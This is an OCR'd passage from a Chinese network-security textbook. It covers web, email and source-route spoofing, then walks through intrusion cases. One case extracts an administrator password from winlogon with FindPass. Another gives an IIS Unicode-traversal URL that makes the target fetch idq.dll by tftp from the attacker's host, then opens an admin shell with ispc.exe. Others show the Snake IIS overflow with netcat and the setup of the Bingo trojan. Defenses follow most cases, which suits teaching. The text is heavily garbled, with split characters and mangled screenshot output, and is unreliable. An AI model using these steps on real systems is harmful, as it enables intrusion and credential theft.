攻击 者 能 够 将 DNS 名 称 查 询 重 定向 到 恶意 DNS 服务 器 。 这 样 攻击 者 可 以 获得 DNS 
服务 器 的 写 权限 。 

4) 防范 DNS 欺骗 攻击 可 采取 的 措施 

QO@ 直接 用 数字 化 的 IP 访问 重要 的 服务 ,这 样 至 少 可 以 避 开 DNS 欺骗 攻击 。 但 这 需要 
记 住 要 访问 的 IP 地 址 。 

@ 加 密 所 有 对 外 的 数据 流 , 对 服务 器 来 说 就 是 尽量 使 用 SSH 之 类 的 有 加 密 支持 的 协 
议 , 对 一 般 用 户 应 该 用 PGP 等 软件 加 密 方法 加 密 所 有 发 送 到 网 络 上 的 数据 。 但 实现 难度 
较 大 。 

4. Web 欺骗 

1) Web 欺骗 的 概念 

Web 欺骗 是 一 种 电子 信息 欺骗 ,攻击 者 在 网 络 中 制作 了 一 个 令 人 信服 但 是 完全 错误 的 
Web。 错 误 的 Web 看 起 来 十 分 逼真 , 它 拥有 相同 的 网 页 和 链接 。 然 而 ,攻击 者 控制 着 错误 
的 Web 站 点 ,这 样 受 攻击 者 浏览 器 和 Web 之 间 的 所 有 网 络 信息 完全 被 攻击 者 所 截获 ,其 工 
作 原 理 就 好 像 是 一 个 过 滤器 。 由 于 攻击 者 可 以 观察 或 者 修改 任何 从 受 攻 击 者 到 Web 服务 
器 的 信息 ; 同样 地 ,也 控制 着 从 Web 服务 器 至 受 攻击 者 的 返回 数据 ,这 样 攻击 者 就 有 许多 
发 起 攻击 的 可 能 性 ,包括 监视 和 破坏 。 

攻击 者 能 够 监视 被 攻击 者 的 网 络 信息 ,记录 他 们 访问 的 网 页 和 内 容 。 攻 击 者 完全 可 以 
截获 被 攻击 者 填写 完 的 一 个 发 送 到 正在 访问 的 Web 服务 器 的 表单 ,并 利用 这 些 截 获 到 的 信 
息 。 绝 大 部 分 在 线 公司 在 进行 业务 往来 的 时 候 , 都 是 使 用 表单 来 完成 业务 的 ,这 意味 着 攻击 
者 可 以 获得 用 户 的 账户 名 和 密码 。 即 使 受 攻击 者 有 一 个 “安全 ?连接 (通常 是 通过 Secure 
Sockets Layer 来 实现 的 ,用 户 的 浏览 器 会 显示 一 把 锁 或 钥匙 来 表示 处 于 安全 连接 ) ,但 仍 无 


第 5 章 网 络 攻击 及 其 防范 129 


法 处 于 真正 的 安全 中 。 

在 得 到 必要 的 数据 后 ,攻击 者 可 以 通过 修改 受 攻击 者 和 Web 服务 器 之 间 任 何 一 个 方向 
上 的 数据 ,来 进行 某 些 破坏 活动 。 例 如 ,攻击 者 可 以 修改 被 攻击 者 的 确认 数据 ,攻击 者 也 能 
修改 被 Web 服务 器 所 返回 的 数据 。 例 如 ,插入 易于 误解 或 者 攻击 性 的 资料 ,破坏 用 户 和 在 
线 公 司 的 关系 等 。 

2) Web 欺骗 的 方式 

常见 的 Web 欺骗 方式 有 以 下 三 种 。 

Q@ 基本 网 站 欺骗 。 攻 击 者 会 利用 网 络 中 注册 一 个 域名 没有 任何 要 求 的 现状 ,抢先 或 特 
别 设计 出 一 个 和 著名 网 站 非常 类 似 的 有 欺骗 性 的 站 点 。 攻 击 者 利用 这 个 虚假 的 界面 ,来 获 
取 用 户 的 信息 。 最 典型 的 例子 是 通过 假冒 的 金融 机 构 的 网 站 来 偷盗 用 户 的 信用 卡 的 信息 。 

Q@ man-in-the-middle 攻击 。 这 种 攻击 方式 实际 上 就 是 攻击 者 把 自己 的 主机 设置 成 被 
攻击 目标 机 器 的 代理 服务 器 ,这 样 , 所 有 外 界 进入 目标 机 器 的 数据 流 都 在 攻击 者 的 监视 之 
下 ,攻击 者 可 以 任意 窃听 甚至 修改 数据 流 里 的 数据 ,收集 到 大 量 的 用 户 信息 。 

@ URL 重 写 。 利 用 这 种 方式 ,使 地 址 都 指向 攻击 者 的 Web 服务 器 , 即 攻击 者 可 能 将 


会 毫 不 防备 地 进入 攻击 者 的 服务 器 ,于 是 可 以 监控 到 用 户 的 所 有 信息 。 

3) Web 欺骗 的 工作 原理 

欺骗 能 够 成 功 的 关键 是 在 受 攻击 者 和 其 他 Web 服务 器 之 间 设 立 起 攻击 者 的 Web 服务 
器 ,这 种 攻击 种 类 在 安全 问题 中 称 为 “来 自 中 间 的 攻击 ”。 为 了 建立 起 这 样 的 中 间 Web 服务 
器 ,黑客 往往 进行 以 下 工作 。 这 里 以 改写 URL 为 例 进行 说 明 。 

(1) 改写 URL 

首先 ,攻击 者 改写 Web 页 中 的 所 有 URL 地 址 ,这样 它们 指向 了 攻击 者 的 Web 服务 器 
而 不 是 真正 的 Web 服务 器 。 当 攻击 者 单 击 改写 过 的 网 址 时 ,其 实 进 入 的 是 虚假 的 网 站 , 假 
的 网 页 将 用 户 的 操作 信息 先 返 回 给 原来 的 真 网 站 , 真 网 站 返回 的 信息 通过 攻击 者 的 Web 服 
务 器 返回 给 用 户 的 浏览 器 。 这 样 用 户 的 所 有 信息 都 经 过 了 攻击 者 的 网 站 过 滤 ,用 户 的 信息 
没有 任何 的 保密 性 和 安全 性 。 

(2) 关于 表单 

如 果 受 攻击 者 填写 了 一 个 错误 Web 上 的 表单 ,那么 结果 看 来 似乎 会 很 正常 ,因为 只 要 
遵循 标准 的 Web 协议 ,表单 欺骗 很 自然 地 不 会 被 察觉 : 表单 的 确定 信息 被 编码 到 URL 中 ， 
内 容 会 以 HTML 形式 来 返回 。 既 然 前 面 的 URL 都 已 经 得 到 了 改写 ,那么 表单 欺骗 将 是 很 
自然 的 事情 。 

当 受 攻击 者 提交 表单 后 ,所 提交 的 数据 进入 了 攻击 者 的 服务 器 。 攻 击 者 的 服务 器 能 够 
观察 ,甚至 是 修改 所 提交 的 数据 。 同 样 地 ,在 得 到 真正 的 服务 器 返回 信息 后 ,攻击 者 仍然 可 
以 修改 返回 给 用 户 的 信息 。 

(3) 关于 “安全 连接 ” 

安全 连接 是 在 用 户 浏览 器 和 Web 服务 器 之 间 建 立 的 一 种 基于 SSL 的 连接 方式 。 可 是 
如 果 受 攻击 者 与 一 个 Web 欺骗 中 所 提供 的 错误 网 页 建立 起 一 个 看 似 正常 的 “安全 连接 ”: 
网 页 的 文档 可 以 正常 地 传输 而 且 作为 安全 连接 标志 的 图 形 ( 通 常 是 关闭 的 一 把 钥匙 或 者 锁 ) 
依然 工作 正常 ,但 实际 上 此 时 的 安全 连接 是 建立 在 一 个 虚假 的 而 非 用 户 所 希望 的 站 点 上 。 
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(4) 攻击 的 导 火 索 

为 了 开始 攻击 ,攻击 者 必须 以 某 种 方式 引诱 受 攻击 者 进入 攻击 者 所 创造 的 错误 的 Web 
页 面 。 黑 客 往往 会 采取 下 面 几 种 方法 。 

@ 把 错误 的 Web 链接 放 到 一 个 热门 Web 站 点 上 。 

@ 如 果 受 攻击 者 使 用 基于 Web 的 邮件 ,那么 可 以 将 它 指向 错误 的 Web。 

@ 创建 错误 的 Web 索引 ,指示 给 搜索 引擎 。 

前 面 描述 的 攻击 相当 有 效 , 但 是 它 还 不 是 十 分 完美 的 。 黑 客 往往 还 要 创造 一 个 可 信 的 
环境 ,隐藏 一 切 与 真正 网 页 不 同 的 地 方 。 另 外 ,黑客 还 会 注意 以 下 方面 。 

g@ 连接 状态 。 连 接 状态 是 位 于 浏览 器 底部 的 提示 信息 , 它 提示 当前 连接 的 各 类 信息 。 
Web 欺骗 中 涉及 两 类 信息 。 首 先 , 当 鼠标 放置 在 Web 链接 上 时 ,显示 链接 所 指 的 URL 地 
址 ,这 样 , 受 攻击 者 可 能 会 注意 到 重 写 的 URL 地 址 。 第 二 , 当 Web 连接 成 功 时 ,连接 状态 将 
显示 所 连接 的 服务 器 名 称 。 这 样 , 可 能 发 现 正 在 连接 的 网 站 不 是 自己 所 希望 的 站 点 。 

攻击 者 能 够 通过 JavaScript 编程 来 弥补 这 两 项 不 足 。 由 于 JavaScript 能 够 对 连接 状态 
进行 写 操作 ,而 且 可 以 将 JavaScript 操作 与 特定 事件 绑 定 在 一 起 ,所 以 ,攻击 者 完全 可 以 将 
改写 的 URL 状态 恢复 为 改写 前 的 状态 。 这 样 Web 欺骗 将 更 为 可 信 。 

@ 位 置 状 态 行 。 浏 览 器 的 位 置 状态 行 显示 当前 所 处 的 URL 位 置 ,用 户 也 可 以 在 其 中 
输入 新 的 URL 地 址 进入 到 另外 的 URL ,如果 不 进行 必要 的 更 改 , 此 时 URL 会 暴露 出 改写 
后 的 URL。 同 样 地 ,利用 JavaScript 可 以 隐藏 掉 改写 后 的 URL。JavaScript 能 用 不 真实 的 
URL 掩盖 真实 的 URL, 也 能 够 接受 用 户 的 键盘 输入 ,并 将 之 改写 ,进入 不 正确 的 URL。 

4) Web 欺骗 的 预防 和 解决 

尽管 攻击 者 在 进行 Web 欺骗 时 伪装 得 很 好 ,但 是 还 是 会 留 下 一 些 线索 可 以 被 识破 。 对 
于 Web 欺骗 攻击 的 防范 和 解决 手段 ,通常 有 以 下 两 种 方法 。 

(1) 逃离 伪 Web 页 面 

受 攻击 者 可 以 自觉 与 不 自觉 地 离开 攻击 者 的 错误 Web 页 面 。 这 里 有 若干 种 方法 。 访 
问 Bookmark 或 使 用 浏览 器 中 提供 的 Open location 进入 其 他 Web 页 面 ,离开 攻击 者 所 设 
下 的 陷阱 。 不 过 , 若 用 户 使 用 Back 键 , 则 会 重新 进入 原先 的 错误 Web 页 面 。 当 然 , 如 果 用 
户 将 所 访问 的 错误 Web 存 人 Bookmark ,那么 下 次 可 能 会 直接 进入 攻击 者 所 设 下 的 陷阱 。 

(2) 预防 办 法 

为 了 取得 短期 的 效果 ,可 以 从 以 下 三 方面 来 预防 。 

QO@ 禁止 浏览 器 中 的 JavaScript 功能 ,那么 各 类 改写 信息 将 会 暴露 出 来 。 

@ 确保 浏览 器 的 连接 状态 是 可 见 的 , 它 将 给 用 户 提 供 当前 位 置 的 各 类 信息 。 

@ 时 刻 注意 所 单 击 的 URL 链接 会 在 位 置 状 态 行 中 得 到 正确 的 显示 。 

现在 ,JavaScript、ActiveX 以 及 Java 提供 越 来 越 丰富 和 强大 的 功能 ,而 且 为 黑客 们 进行 
攻击 活动 提供 了 强大 的 手段 。 为 了 保证 安全 ,建议 用 户 考虑 禁止 这 些 功能 。 

如 果 只 是 进行 短期 的 设置 , 那 需要 用 户 在 每 次 使 用 时 ,都 进行 设置 ,所 以 使 用 其 他 的 解 
决 方案 ,包括 : 

@ 改变 浏览 器 ,使 之 具有 反映 真实 URL 信息 的 功能 ,而 不 会 被 蒙蔽 。 

@ 对 于 通过 安全 连接 建立 的 Web- 浏 览 器 对 话 ,浏览 器 还 应 该 告诉 用 户 谁 在 另 一 端 , 而 
不 只 是 表明 一 种 安全 连接 的 状态 。 比 如 : 在 建立 了 安全 连接 后 ,给 出 一 个 提示 信息 
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“Netscapelnc. ”等 。 

5. 电子 邮件 欺骗 

1) 电子 邮件 欺骗 的 概念 

电子 邮件 欺骗 是 指 对 电子 邮件 的 信息 头 进行 修改 ,以 使 该 信息 看 起 来 好 像 来 自 其 真实 
源 地 址 之 外 的 其 他 地 址 。 垃 圾 邮件 的 传播 者 通常 使 用 哄骗 的 方式 来 达到 诱 使 接收 者 打开 电 
子 邮 件 ,甚至 可 能 对 他 们 的 请 求 进 行 回复 的 目的 。 

攻击 者 使 用 电子 邮件 欺骗 有 三 个 目的 : 第 一 ,隐藏 自己 的 身份 ; 第 二 ,如 果 攻 击 者 想 冒 
充 别 人 ,他 能 假冒 那个 人 的 电子 邮件 ,使 用 这 种 方法 ,无 论 谁 接收 到 这 封 邮件 ,都 会 认为 这 是 
攻击 者 冒充 的 那个 人 发 的 ; 第 三 ,电子 邮件 欺骗 能 被 看 做 是 社会 工程 的 一 种 表现 形式 。 例 
如 ,如 果 攻 击 者 想 让 用 户 发 给 他 一 份 敏感 文件 ,攻击 者 伪装 他 的 邮件 地 址 ,使 用 户 认 为 这 是 
老板 的 要 求 ,用户 可 能 会 发 给 他 这 封 邮 件 。 

2) 电子 邮件 欺骗 的 方式 

执行 电子 邮件 欺骗 有 三 种 方式 ,每 一 种 有 不 同 的 难度 级 别 , 不 同 层次 的 隐蔽 程度 。 下 面 
分 别 进行 介绍 。 

(1) 相似 的 电子 邮件 地 址 

在 使 用 这 种 类 型 的 攻击 时 ,攻击 者 会 先 找到 一 个 公司 的 老板 或 者 高 级 管理 人 员 的 名 字 ， 
并 利用 这 个 名 字 注 册 一 个 看 上 去 像 高 级 管理 人 员 的 邮箱 地 址 。 当 攻击 者 把 邮件 发 给 该 公司 
的 客户 时 ,客户 会 很 容易 相信 这 是 真 的 。 同 时 ,在 打开 邮箱 时 ,一般 在 发 件 人 字段 中 只 会 显 
示 邮 箱 地 址 的 别名 字段 。 这 样 看 来 邮件 地 址 似乎 是 正确 的 ,所 以 收 信人 很 可 能 会 回复 。 当 
攻击 者 收 到 回复 信息 后 ,也 就 得 到 了 想 要 的 信息 。 

由 于 用 户 使 用 默认 设置 的 原因 ,用 户 只 会 看 到 邮件 地 址 的 别名 字段 。 所 以 用 户 方面 也 
要 加 强 防范 意识 。 

(2) 修改 邮件 客户 

当 用 户 发 出 一 封 电子 邮件 时 ,没有 对 发 件 人 地 址 进行 验证 或 者 确认 ,因此 如 果 攻 击 者 有 
一 个 像 Outlook 的 邮件 客户 ,他 能 够 进入 并 且 指 定 他 想 出 现在 发 件 人 中 的 所 有 地 址 。 由 于 
攻击 者 能 够 指定 他 想 要 的 任何 返回 地 址 ,因此 当 用 户 回信 时 ,答复 回 到 真实 的 地 址 ,而 不 是 
回 到 被 盗用 了 地 址 的 人 那里 。 

(3) 远程 联系 ,登录 25 端口 

邮件 欺骗 一 个 更 复杂 的 方法 是 远程 登录 到 邮件 服务 器 的 端口 25 ,邮件 服 务 器 使 用 它 在 
互联 网 上 发 送 邮 件 。 当 攻击 者 想 发 送 给 用 户 信 息 时 ,他 先 写 一 个 信息 ,然后 发 送 。 接 下 来 他 
的 邮件 服务 器 与 用 户 的 邮件 服务 器 联系 ,在 端口 25 发 送信 息 ,转移 信息 。 然 后 用 户 的 邮件 
服务 器 把 这 个 信息 发 送 给 用 户 。 因 为 邮件 服务 器 使 用 端口 25 发 送信 息 , 所 以 没有 理由 说 明 
攻击 者 不 会 连接 到 25, 装 做 是 一 台 邮 件 服务 器 ,然后 写 一 个 信息 。 有 时 攻击 者 会 使 用 端口 
扫描 来 判断 哪个 服务 器 的 端口 25 是 开放 的 ,以 此 找到 邮件 服务 器 的 IP 地 址 。 

3) 电子 邮件 欺骗 的 防范 措施 

针对 上 述 三 种 电子 邮件 欺骗 的 方法 ,可 以 采取 相对 的 措施 来 进行 防范 。 

Q@ 用 户 在 使 用 电子 邮件 时 ,特别 是 收 到 不 明 邮 件 的 时 候 , 必 须要 提高 警惕 性 ,对 于 重要 
的 邮件 更 要 小 心 谨慎 。 

@ 由 于 邮件 客户 端 软件 是 邮件 收发 的 操作 环境 ,所 以 对 邮件 客户 端 软件 要 进行 使 用 限 
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制 ,如 设立 密码 等 。 

@ 加 强 对 邮件 服务 器 的 管理 ,关闭 不 必要 的 网 络 端口 ,邮件 服务 器 设置 为 不 允许 邮件 
转发 ,并 且 一 个 邮件 服务 器 应 该 只 发 送 或 者 接收 一 个 指定 域名 或 者 公司 的 邮件 ,以 避免 攻击 
者 从 外 部 侵入 。 

6. 源 路 由 欺骗 

通过 指定 路 由 ,以 假冒 身份 与 其 他 主机 进行 合法 通信 或 发 送 假 报 文 ,使 受 攻击 主机 出 现 
错误 动作 ,这 就 是 源 路 由 攻击 。 在 通常 情况 下 ,信息 包 从 起 点 到 终点 走 过 的 路 径 是 由 位 于 此 
两 点 间 的 路 由 器 决定 的 ,数据 包 本 身 只 知道 去 往 何 处 ,但 不 知道 该 如 何 去 。 源 路 由 可 使 信息 
包 的 发 送 者 将 此 数据 包 要 经 过 的 路 径 写 在 数据 包 里 ,使 数据 包 循 着 一 个 对 方 不 可 预料 的 路 
径 到 达 目 的 主机 。 下 面 仍 以 上 述 源 IP 欺骗 中 的 例子 给 出 这 种 攻击 的 形式 : 主机 A 享有 主机 
B 的 某 些 特 权 , 主 机 X 想 冒充 主机 A 从 主机 B( 假 设 IP 为 aaa. bbb. ccc. ddd) 获 得 某 些 服务 。 首 
先 ,攻击 者 修改 距离 X 最 近 的 路 由 器 ,使 得 到 达 此 路 由 器 且 包 含 目 的 地 址 aaa. bbb. ccc. ddd 的 
数据 包 以 主机 X 所 在 的 网 络 为 目的 地 ; 然后 ,攻击 者 X 利用 IP 欺骗 向 主机 B 发 送 源 路 由 
(指定 最 近 的 路 由 器 ) 数 据 包 。 当 B 回 送 数据 包 时 ,就 传送 到 被 更 改过 的 路 由 器 。 这 就 使 一 
个 人 侵 者 可 以 假冒 一 个 主机 的 名 义 通过 一 个 特殊 的 路 径 来 获得 某 些 被 保护 数据 。 

为 了 防范 源 路 由 欺骗 攻击 ,一 般 采 用 下 面 几 种 措施 。 

@ 对 付 这 种 攻击 最 好 的 办 法 是 配置 好 路 由 器 ,使 它 抛 弃 那 些 由 外 部 网 进来 的 却 声称 是 
内 部 主机 的 报 文 。 

@ 在 路 由 器 上 关闭 源 路 由 。 用 命令 no ip source-route 关闭 源 路 由 。 

@ 对 于 路 由 器 的 访问 控制 ,需要 进行 口令 的 分 级 保护 。 

@ 与 对 端 通信 时 ,不 一 定 需 要 用 真实 身份 进行 通信 。 通 过 地 址 转换 ,可 以 做 到 隐藏 网 
内 地 址 .只 以 公共 地 址 的 方式 访问 外 部 网 络 。 除 了 由 内 部 网 络 首先 发 起 的 连接 ,网 外 用 户 不 
能 通过 地 址 转换 直接 访问 网 内 资源 。 

@ 网 内 传输 数据 实行 加 密 保护 ,防止 截获 破解 。 

@ 路 由 器 提供 攻击 检测 ,可 以 有 效 防止 一 部 分 的 攻击 。 


5.3 ”网络 攻击 防范 案例 


5.3.1 案例 1: 获取 管理 员 密 码 


用 户 登 录 以 后 ,所 有 的 用 户 信 息 都 存储 在 系统 的 一 个 进程 中 ,这 个 进程 是 winlogon. 
exe, 可 以 利用 程序 将 当前 登录 用 户 的 密码 解码 出 来 。 这 里 用 到 的 两 个 应 用 程序 是 
FindPass. exe 和 pulist. exe。 使 用 FindPass 等 工具 可 以 对 该 进程 进行 解码 ,然后 将 当前 用 
户 的 密码 显示 出 来 。 将 FindPass. exe 拷贝 到 C 盘 根 目录 ,执行 该 程序 ,将 得 到 当前 用 户 的 
登录 名 ,如 图 5-4 所 示 。 

如 果 有 多 人 登录 同一 台 计 算 机 ,还 可 以 查看 其 他 用 户 的 密码 ,使 用 的 语法 如 下 : 


FindPass. exe DomainName UserName PID-of-WinLogon 


第 一 个 参数 DomainName 是 计算 机 的 名 称 , 通 过 右 击 “我 的 电脑 ”> “属性”, 可 以 看 到 ，; 
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icrosoft Windows 2999 [Uersion 5-98-2195] 
kc》 版权 所 有 1985-1998 Microsoft Corp- 


:Documents and Settings\Adninistrator)cd\ 
: Vrindpass.exe 


To Find Password in the Winlogon process 
Usage: findpass.exe DonainNane UserNane PID-of-WinLogon 


he debug privilege has been added to PasswordReninder. 

he WinLogon process id is 192 《BxB9BB99c9) - 

To find ADSERVER\Adninistrator password in process 192 .. 

he encoded passvord is found at OxDDdcDd and has a longth of 3- 
he logon information is: ADSERUER/Adninistrator/123. 

he hash byte is: Gx9c- 


:> 


图 5-4 获取 用 户 名 和 密码 


第 二 个 参数 UserName 是 需要 查看 密码 的 用 户 名 ,这 个 用 户 必须 登录 到 系统 ,如 果 没有 登录 

到 系统 ,在 WinLogon 进程 中 不 会 有 该 用 户 的 密码 ; 第 三 个 参数 是 WinLogon 进程 在 系统 

中 的 进程 号 。 前 两 个 参数 都 容易 知道 ,WinLogon 的 进程 号 只 有 到 任务 管理 器 中 才能 看 到 ， 

te pulist. exe 程序 查看 WinLogon 的 进程 号 。 使 用 的 方法 如 图 5-5 所 示 。 所 
以 只 要 可 以 侵入 某 个 系统 ,获取 管理 员 或 者 超级 用 户 的 密码 是 可 能 的 。 


icrosoft Windows 2989 [Uersion 5.99-2195] 
C》 版 权 所 有 1985-1998 Microsoft Corp- 


:Documents and SettingsNhdninistratorycdN 


:Vpulist.exe 
p User 


NT AUTHORITYNSYSTEM 
NT AUTHORITYNSYSTEM 
NT AUTHORITYNSYSTEM 
NT AUTHORITYNSYSTEM 
NT AUTHORITYNSYSTEM 
NT AUTHORITYNSYSTEM 


图 5-5 查看 WinLogon 的 进程 号 

防范 方法 : 

(1) 密码 设 定 长 度 要 超过 规定 的 长 度 。 通 常 应 长 于 8 个 字符 ,当然 越 长 越 安全 。 

(2) 密码 中 所 包含 的 元 素 至 少 包 括 下 列 字符 集中 的 三 种 : 大 写字 符 、 小 写字 符 、 数 字 、 
非 数 字 字 母 符号 。 

(3) 不 要 包含 可 能 含有 任何 用 户 信息 的 元 素 , 如 姓名 .公司 名 、 生 日 .年龄 ,性别 . 所 在 城 
市 .亲属 姓名 、 代 号 .常见 词 等 。 

(4) 注意 在 系统 中 保存 的 密码 应 采用 加 密 方 式 存储 。 

(5) 在 Windows 中 禁止 存储 LM 散 列 ,而 采用 NT Hash。 


5.3.2 案例 2: 使 用 Unicode 漏洞 进行 攻击 


在 地 址 栏 上 执行 命令 ,用 户 的 权限 比较 低 , 像 net 等 系统 管理 指令 不 能 执行 。 利 用 
Unicode 则 可 以 入 侵 对 方 的 系统 ,并 得 到 管理 员 权限 。 首 先 需要 向 对 方 服 务 器 上 传 一 些 文 
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件 , 入 侵 的 第 一 步 , 建 立 TFTP 服务 器 ,向 对 方 的 scripts 文件 夹 传 一 个 文件 。Unicode 漏洞 
是 2000 年 10 月 17 日 发 布 的 , 受 影响 的 版 本 包括 : Microsoft IIS 5. 0 十 Microsoft Windows 
2000 系列 版 本 和 Microsoft IIS 4. 0 十 Microsoft Windows NT 4.0。 消 除 该 漏洞 的 方式 是 
安装 操作 系统 的 补丁 ,只 要 安装 了 SP1 以 后 ,该 漏洞 就 不 存在 了 。 微 软 IIS 4.0 和 IIS 5.0 
都 存在 利用 扩展 Unicode 字符 取代 “/” 和 “\” 而 能 利用 “.. /” 目 录 遍 历 的 漏洞 。 

要 实现 利用 此 漏洞 进行 攻击 ,需要 上 传 一 个 名 为 idq. dll 的 文件 ,为 了 上 传 这 个 文件 , 首 
先 在 本 地 计算 机 上 搭建 一 个 TFTP 服务 器 ,普通 文件 传输 协议 (Text File Transmission 
Protocol,TFTP) 一 般 用 来 传输 单个 文件 。 使 用 工具 软件 tftpd32. exe 建立 服务 器 。 将 idq. 
dll 和 tftpd32. exe 放 在 本 地 的 同一 目录 下 ,执行 tftpd32. exe 程序 , 主 界面 如 图 5-6 所 示 。 

这 样 在 本 地 的 TFTP 的 服务 器 就 建立 好 了 ,保留 这 个 窗口 ,通过 该 服务 器 向 对 方 传递 
idq. dll 文件 。 在 浏览 器 中 执行 命令 :“http://219. 246. 5. 131/scripts/.. % c0% 2f../ 
winnt/system32/cmd. exe?/c 十 tftp 十 -i 十 219. 246. 5. 110 十 get 十 idq. dllj”, 命令 其 实 是 
“tftp -i 219. 246. 5. 110 get idq. dll”, 意 思 是 从 219. 246. 5. 110 服务 器 上 获取 idq. dll 文件 ， 
执行 成 功 的 界面 如 图 5-7 所 示 。 


Error in C6I Application 一 Windows Internet Explorer |- | 口 |X 


TAR — 
DO uo.26.5. lS ix | 


文件 编 姓 他 ) 可 看 WW) 收 大 天 信 工具 I) 帮助 0) 
{Goso |B- EE 下 
帘 交 | Error in cor homie 一 | 从 - 答 - 这 页 面 E) - 


CGI Error 


The specified CGI application misbehaved by not returning a 
complete set of HTTP headers. The headers it did return 
are: 


TFTPD32 by Ph. Jounin 


Base Directory |D:\ 虚 面 示 西 \i+ 算 机 网 络 安 全 ## Browse 
Server nterface |219246.5110 了 j ShowDr 


Curent Action [Uistening on port 
About Setings 


图 5-6 建立 TFTP 服务 图 5-7 上 传 文件 


上 传 完 毕 后 可 以 查看 一 下 scripts 目录 ,检查 是 否 上 传 成 功 ,如 图 5-8 所 示 。 


=|9|¥ 
文件 (编外 查看 WW) 收 庆 (8) 工具 帮助 由 | 
中 所 -由 | 过 者 喇 文 H 天 地 到 | 喉 全 X 妆 | 图 - 
地 址 (0) [scrprs | 0 
所 
ET 和 
scripts 


图 5-8 查看 scripts 目录 


这 时 说 明 已 经 成 功 地 在 scripts 目录 中 上 传 了 一 个 idq. dll 文件 ,下 面 使 用 工具 软件 
ispc. exe 人 侵 对 方 系统 。 拷 贝 ispc. exe 文件 到 本 地 计算 机 的 C 盘 根 目 录 , 在 DOS 命令 行 下 
执行 命令 :“ispc. exe 172. 18. 25. 109/scripts/idq. dll”, 提示 “We Get It!1” 表 示 连 接 成 功 。 
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之 后 就 进入 了 对 方 的 DOS 命令 窗口 下 ,而 且 具 有 管理 员 权 限 , 这 时 为 了 确定 已 经 进入 目标 
机 ,可 以 通过 查看 其 IP 地 址 以 示 确 定 。 

防范 方法 

(1) 下 载 并 安装 最 新 的 补丁 程序 。 

(2) 更 改 默认 的 WWW 主页 的 目录 。 

(3) 限制 网 络 用 户 访问 和 调用 cmd 的 权限 。 

(4) 在 Scripts\Msadc 目录 没 必要 使 用 的 情况 下 ,删除 该 文件 夹 或 者 改名 。 

(5) 停止 不 必要 的 服务 ,改变 服务 的 端口 号 (在 不 影响 正常 访问 的 情况 下 )。 

(6) 限制 iusr_server 的 权限 ,并 对 admin 账户 和 密码 进行 严格 的 管理 ,并 定期 更 改 


5.3.3 案例 3: 利用 IIS 溢出 进行 攻击 


下 面 介绍 一 个 缓冲 区 溢出 攻击 的 实例 ,来 了 解 以 下 的 攻击 过 程 。 

IIS 除了 存在 漏洞 ,还 可 能 溢出 。 利 用 IIS 溢出 在 对 方 的 计算 机 开放 一 个 端口 ,再 利用 
工具 软件 连接 到 该 端口 ,就 可 以 入 侵 对 方 计算 机 。 

利用 软件 Snake IIS 溢出 工具 可 以 让 对 方 的 IIS 溢出 ,还 可 以 捆绑 执行 的 命令 在 对 方 计 
算 机 上 开辟 端口 ,Snake IIS 工具 软件 的 主 界面 如 图 5-9 所 示 。 


Snake IIS 洲 出 工具 (Y2.0 Build 00013) 


三 阁 出 选项 
个 ! 英 出 后 , 主动 连接 到 ITP/Pert 
TU [rT 


-ITS5 Mexico Win2k sp2 


[EnalegIIS 赣 出 工具 , 请 在 知道 后 果 的 情况 下 使 用 ,因为 ， 一切 
一 by snake. (http’//snakel2. top263. net) 


图 5-9 ”Snake IIS 工具 软件 主 界面 


该 软件 适用 于 各 种 类 型 的 操作 系统 ,比如 对 219. 246. 5. 131 进行 攻击 ,219. 246. 5. 131 
的 操作 系统 Windows 2000 没有 安装 补丁 程序 ,攻击 完毕 后 ,开辟 一 个 813 端口 ,并 在 对 方 
计算 机 上 执行 命令 “dir: \”, 设 置 如 图 5-9 中 1,2,3,4 所 示 。 设 置 完 成 后 , 单 击 “IDQ 溢出 ” 
按钮 ,出现 攻击 成 功 的 提示 框 ,如 图 5-10 所 示 。 

这 时 ,813 端口 已 经 打开 ,利用 工具 软件 nc. exe 连接 到 该 端口 ,将 会 自动 执行 刚才 发 送 
的 DOS 命令 *dir c: \”, 使 用 的 命令 是 “nc. exe -vv 172. 18. 25. 109 813”, 其 中 ,-vv 是 程序 的 
参数 ,813 是 目标 端口 。 命 令 的 执行 结果 如 图 5-11 所 示 。 

成 功 执行 了 发 送 的 命令 ,就 可 以 发 送 新 建 用 户 并 将 用 户 添加 到 管理 员 组 的 命令 ,这 样 就 
可 以 入 侵 对 方 计算 机 了 。 该 攻击 方法 的 缺点 是 一 次 只 能 执行 一 条 命令 。 

防范 方法 : 针对 该 漏洞 攻击 最 简单 的 方法 就 是 下 载 并 安装 最 新 的 补丁 程序 。 
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Snake IIS 洲 出 工具 (¥2.0 Build 00013) S x 


三 被 攻击 地 址 :一 一 一 一 一 一 一 一 一 一 退出 x 
亚 : E19.246.5. 131 ert: 


图 5-10 攻击 提示 信息 


RDSERVER [219.246.5.131] 813 《?》 
ent 目 。 rcv 


:Inc.exe -vu 219.246.5.131 813 
DSERUER [219.246.5.131] 813 《?》 
ent 8, rcvd 日 


;Ync.exe -vv 219.246.5.131 813 
DSERUER [219.246.5.131] 813 《?》 
ent 8, rcvd 9 


:ne.exe -uv 219.246.5.131 813 
DOERUER Ca49.246:5-1343 813 ¢?> open 
9 卷 没 : 


凤 。 
的 漂 列 号 是 B45F-6669 

css 的 目录 
eez-1e-19 Ba:45 <DIR> WINNT 


Pea2-19-19 84:58 <DIR> Docunents and Settings 
P982-10-13 “es 51 <DIR> Progran Piles 


图 5-11 连接 并 执行 命令 


5.3.4 案例 4: 使 用 “冰河 ”进行 远程 控制 


常见 的 简单 森马 有 NetBus 远程 控制 “冰河 ”木马 .PCAnyWhere 远程 控制 等 。 这 里 介 
绍 一 种 最 常见 的 木马 程序 :“ 冰 河 ".。“ 冰 河 ” 包 含 两 个 程 1 
序 文 件 ,一 个 是 服务 器 端 , 另 一 个 是 客户 端 。“ 冰 河 8. 2” We 
的 文件 列表 如 图 5-12 所 示 。 图 5-12 “冰河 8.2” 的 文件 列表 

win32. exe 文件 是 服务 器 端 程序 ,Y_Client. exe 文件 
为 客户 端 程序 。 将 win32. exe 文件 在 远程 计算 机 上 执行 以 后 ,通过 Y_Client. exe 文件 来 控 
制 远 程 的 服务 器 ,客户 端的 主 界面 如 图 5-13 所 示 。 

将 服务 器 程序 种 到 对 方 主机 之 前 需要 对 服务 器 程序 做 一 些 设置 ,比如 连接 端口 .连接 密 
码 等 。 选 择 菜 单 栏 "设置 ?下 的 菜单 项 “配置 服务 器 程序 ”。 在 出 现 的 对 话 框 中 选择 服务 器 端 
